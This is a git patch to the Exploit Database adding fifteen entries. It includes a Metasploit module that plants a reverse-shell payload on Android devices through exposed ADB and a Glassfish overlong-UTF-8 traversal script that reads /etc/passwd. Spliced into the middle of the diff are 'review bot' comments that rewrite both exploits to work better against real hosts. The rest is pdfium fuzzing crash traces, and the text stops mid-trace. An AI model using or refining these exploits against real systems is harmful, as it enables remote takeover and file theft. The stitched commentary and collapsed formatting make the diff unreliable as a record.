From 67dd87a6f52b074fbc83d31b4fdb3388429ad8d6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 27 Jan 2016 05:03:06 +0000
Subject: [PATCH] DB: 2016-01-27 15 new exploits
---
 files.csv                         | 15 ++++
 platforms/android/remote/39328.rb | 85 +++++++++++++++++++
 platforms/java/webapps/39241.py   | 13 +++
 platforms/multiple/dos/39321.txt  | 103 +++++++++++++++++++++++
 platforms/multiple/dos/39322.txt  | 109 ++++++++++++++++++++++++
 platforms/multiple/dos/39323.txt  | 65 +++++++++++++++
 platforms/multiple/dos/39324.txt  | 113 +++++++++++++++++++++++++
 platforms/multiple/dos/39325.txt  | 89 ++++++++++++++++++++
 platforms/multiple/dos/39326.txt  | 64 ++++++++++++++
 platforms/multiple/dos/39327.txt  | 133 ++++++++++++++++++++++++++++++
 platforms/php/webapps/39319.txt   | 77 +++++++++++++++++
 platforms/php/webapps/39320.txt   | 48 +++++++++++
 platforms/windows/dos/39274.py    | 32 +++++++
 platforms/windows/dos/39329.py    | 29 +++++++
 platforms/windows/dos/39330.txt   | 66 +++++++++++++++
 platforms/windows/dos/39331.pl    | 35 ++++++++
 16 files changed, 1076 insertions(+)
 create mode 100755 platforms/android/remote/39328.rb
 create mode 100755 platforms/java/webapps/39241.py
 create mode 100755 platforms/multiple/dos/39321.txt
 create mode 100755 platforms/multiple/dos/39322.txt
 create mode 100755 platforms/multiple/dos/39323.txt
 create mode 100755 platforms/multiple/dos/39324.txt
 create mode 100755 platforms/multiple/dos/39325.txt
 create mode 100755 platforms/multiple/dos/39326.txt
 create mode 100755 platforms/multiple/dos/39327.txt
 create mode 100755 platforms/php/webapps/39319.txt
 create mode 100755 platforms/php/webapps/39320.txt
 create mode 100755 platforms/windows/dos/39274.py
 create mode 100755 platforms/windows/dos/39329.py
 create mode 100755 platforms/windows/dos/39330.txt
 create mode 100755 platforms/windows/dos/39331.pl
diff --git a/files.csv b/files.csv
index 922acbdf6..fdf8ddb6b 100755
--- a/files.csv
+++ b/files.csv
@@ -35489,6 +35489,7 @@ id,file,description,date,author,platform,type,port
 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
+39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read Vulnerability",2016-01-15,bingbing,java,webapps,4848
 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0
 39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
 39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
@@ -35517,6 +35518,7 @@ id,file,description,date,author,platform,type,port
 39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
 39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
+39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
@@ -35558,3 +35560,16 @@ id,file,description,date,author,platform,type,port
 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0
 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0
+39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80
+39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80
+39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0
+39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,metasploit,android,remote,5555
+39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
+39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
+39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
diff --git a/platforms/android/remote/39328.rb b/platforms/android/remote/39328.rb
new file mode 100755
index 000000000..c1f71095d
--- /dev/null
+++ b/platforms/android/remote/39328.rb
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/adb'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Android ADB Debug Server Remote Payload Execution',
+      'Description' => %q{
+        Writes and spawns a native payload on an android device that is listening
+        for adb debug messages.
+      },
+      'Author' => ['joev'],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+      'Platform' => 'linux',
+      'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
+      'Targets' => [
+        ['armle', {'Arch' => ARCH_ARMLE}],
+        ['x86', {'Arch' => ARCH_X86}],
+        ['x64', {'Arch' => ARCH_X86_64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 01 2016'
+    ))
+
+    register_options([
+      Opt::RPORT(5555),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
+    ], self.class)
+  end
+
+  def check
+    setup_adb_connection do
+      device_info = @adb_client.connect.data
+      print_good "Detected device:\n#{device_info}"
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    response = @adb_client.exec_cmd(cmd)
+    print_good "Command executed, response:\n #{response}"
+  end
+
+  def exploit
+    setup_adb_connection do
+      device_data = @adb_client.connect
+      print_good "Connected to device:\n#{device_data.data}"
+      execute_cmdstager({
+        flavor: :echo,
+        enc_format: :octal,
+        prefix: '\\\\0',
+        temp: datastore['WritableDir'],
+        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
+        background: true,
+        nodelete: true
+      })
+    end
+  end
+
+  def setup_adb_connection(&blk)
+    begin
+      print_status "Connecting to device..."
+      connect
+      @adb_client = Rex::Proto::ADB::Client.new(sock)
+      blk.call
+    ensure
+      disconnect
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/java/webapps/39241.py b/platforms/java/webapps/39241.py
new file mode 100755
index 000000000..5745a4a42
--- /dev/null
+++ b/platforms/java/webapps/39241.py
@@ -0,0 +1,13 @@
+# Title: glassfish Arbitrary file read vulnerability
+# Date : 01/15/2016
+# Author: bingbing
+# Software link: https://glassfish.java.net/download.html
+# Software: GlassFish Server
+# Tested: Windows 7 SP1 64bits
+
+
+#!/usr/bin/python
+import urllib2
+response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd')
+s=response.read()
+print s
\ No newline at end of file
diff --git a/platforms/multiple/dos/39321.txt b/platforms/multiple/dos/39321.txt
new file mode 100755
index 000000000..73b5c06e7
--- /dev/null
+++ b/platforms/multiple/dos/39321.txt
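Review bot: `check` can never return `Exploit::CheckCode::Unknown`: the block handed to `setup_adb_connection` always reaches `return Exploit::CheckCode::Vulnerable`, and any failure in `connect` or `@adb_client.connect` propagates as an exception because the `begin`/`ensure` in `setup_adb_connection` only disconnects and rescues nothing, so a closed port surfaces as a stack trace instead of a CheckCode. The check also reports Vulnerable on any completed handshake; if the device has ADB authentication enabled the reply is presumably an AUTH message rather than a CNXN carrying device info, so it is worth confirming the response type before calling the target Vulnerable. Rescuing the connection errors and returning `Safe` would make the method behave like the rest of the framework; a sketch follows. Operators should also note that `nodelete: true` in `exploit` leaves the staged payload in `WritableDir` (default `/data/local/tmp/`) after the run.
```ruby
  def check
    setup_adb_connection do
      device_info = @adb_client.connect.data
      print_good "Detected device:\n#{device_info}"
      return Exploit::CheckCode::Vulnerable
    end
    # Only reached if the block neither returned nor raised.
    Exploit::CheckCode::Unknown
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::EOFError => e
    vprint_error("ADB handshake failed: #{e.message}")
    Exploit::CheckCode::Safe
  end
```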
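Review bot: The target is hard-coded to `http://localhost:4848` and the requested file is `etc/passwd`, even though the header says the PoC was tested on Windows 7 SP1, where that path does not exist — on the stated platform a 404 from an unaffected server and a 404 for a missing file are indistinguishable, so the script cannot demonstrate the traversal there. The `#!/usr/bin/python` line is also buried at line 9 and has no effect as a shebang. Taking the base URL and the file path from `sys.argv` (e.g. `windows/win.ini` on Windows) and adding a timeout would make the PoC usable against a real host; a sketch follows. For defenders: `%c0%ae` is the overlong UTF-8 encoding of `.`, so the traversal only works where the server's decoder accepts non-canonical sequences, and a filter that only normalises `%2e`/`..` would presumably not see it.
```python
#!/usr/bin/python
import sys, urllib2
base = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:4848'
target_file = sys.argv[2] if len(sys.argv) > 2 else 'etc/passwd'  # e.g. windows/win.ini on Windows
url = base + '/theme/META-INF/' + '%c0%ae%c0%ae/' * 10 + target_file
print urllib2.urlopen(url, timeout=10).read()
```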
@@ -0,0 +1,103 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=626 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +==9326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250001bf680 at pc 0x000000892375 bp 0x7ffca7393ea0 sp 0x7ffca7393e98 +READ of size 4 at 0x6250001bf680 thread T0 + #0 0x892374 in opj_jp2_apply_pclr third_party/pdfium/third_party/libopenjpeg20/jp2.c:1018:18 + #1 0x88d536 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1512:5 + #2 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10 + #3 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11 + #4 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #5 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36 + #6 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698 + #7 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #8 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #9 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #10 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #11 
0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #12 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #13 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #14 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #15 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #16 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #17 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #18 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3 + #19 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3 + #20 0x4dae22 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3 + #21 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9 + #22 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5 +0x6250001bf680 is located 0 
bytes to the right of 9600-byte region [0x6250001bd100,0x6250001bf680) +allocated by thread T0 here: + #0 0x4b0154 in __interceptor_calloc + #1 0x88219f in opj_j2k_update_image_data third_party/pdfium/third_party/libopenjpeg20/j2k.c:8157:57 + #2 0x8817d7 in opj_j2k_decode_tiles third_party/pdfium/third_party/libopenjpeg20/j2k.c:9603:23 + #3 0x869d57 in opj_j2k_exec third_party/pdfium/third_party/libopenjpeg20/j2k.c:7286:41 + #4 0x869d57 in opj_j2k_decode third_party/pdfium/third_party/libopenjpeg20/j2k.c:9796 + #5 0x88d234 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1483:8 + #6 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10 + #7 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11 + #8 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #9 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36 + #10 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698 + #11 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #12 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #13 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #14 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) 
third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #15 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #16 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #17 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #18 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #19 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #20 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #21 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #22 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3 + #23 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3 + #24 0x4dae22 in RenderPage(std::__1::basic_string, std::__1::allocator > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3 + #25 0x4dd558 in RenderPdf(std::__1::basic_string, std::__1::allocator > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9 + #26 0x4de3d1 in 
main third_party/pdfium/samples/pdfium_test.cc:597:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (pdfium_test+0x892374) +Shadow bytes around the buggy address: + 0x0c4a8002fe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002feb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a8002fec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c4a8002fed0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002fee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002fef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a8002ff20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==9326==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554172. Attached is a PDF file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39321.zip + diff --git a/platforms/multiple/dos/39322.txt b/platforms/multiple/dos/39322.txt new file mode 100755 index 000000000..08702e1ed --- /dev/null +++ b/platforms/multiple/dos/39322.txt 
@@ -0,0 +1,109 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=624 + +The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing: + +--- cut --- +$ ./pdfium_test asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a +Rendering PDF file asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a. +Non-linearized path... +================================================================= +==28048==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000b400 at pc 0x000000a91f64 bp 0x7fffdebdb0f0 sp 0x7fffdebdb0e8 +READ of size 4 at 0x61200000b400 thread T0 + #0 0xa91f63 in opj_j2k_read_mcc third_party/libopenjpeg20/j2k.c:5378:35 + #1 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23 + #2 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41 + #3 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15 + #4 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9 + #5 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10 + #6 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8 + #7 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #8 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24 + #9 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #10 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #11 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) 
core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #12 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #13 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #14 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #15 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #16 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #17 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #18 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #19 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #20 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #21 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #22 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #23 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #24 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +0x61200000b400 is located 0 bytes to the right of 320-byte region 
[0x61200000b2c0,0x61200000b400) +allocated by thread T0 here: + #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0xa8b0b3 in opj_j2k_read_siz third_party/libopenjpeg20/j2k.c:2262:25 + #2 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23 + #3 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41 + #4 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15 + #5 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9 + #6 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10 + #7 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8 + #8 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10 + #9 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24 + #10 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5 + #11 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13 + #12 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7 + #13 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, 